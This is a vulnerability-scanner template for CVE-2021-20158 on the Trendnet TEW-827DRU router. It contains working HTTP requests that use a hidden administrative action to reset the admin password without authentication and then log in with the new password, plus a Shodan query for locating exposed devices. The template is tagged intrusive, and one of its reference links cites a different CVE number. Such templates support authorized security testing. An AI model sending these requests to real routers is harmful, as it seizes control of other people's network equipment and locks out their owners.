id: CVE-2021-20158 info: name: Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change author: gy741 severity: critical description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command. remediation: | Upgrade to the latest firmware version provided by Trendnet to fix the vulnerability. reference: - https://www.tenable.com/security/research/tra-2021-54 - https://nvd.nist.gov/vuln/detail/CVE-2021-20150 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-20158 cwe-id: CWE-306 epss-score: 0.01211 epss-percentile: 0.83646 cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:* metadata: max-request: 2 vendor: trendnet product: tew-827dru_firmware shodan-query: http.html:"TEW-827DRU" tags: disclosure,router,intrusive,tenable,cve,cve2021,trendnet variables: password: "{{rand_base(6)}}" http: - raw: - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password={{password}} - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass={{base64(password)}}&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id= matchers-condition: and matchers: - type: word part: body words: - 'setConnectDevice' - 'setInternet' - 'setWlanSSID' - 'TEW-827DRU' condition: and - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 4a0a00473045022100875620fc40f64ebf05658aa56426c515a807c8f2dfc2a7d5ee618c3936c95aaa0220155a71a8980801878b04459256c3925053b64ead2d7ef5748865c2e1fb68ebad:922c64590222798bb761d5b6d8e72950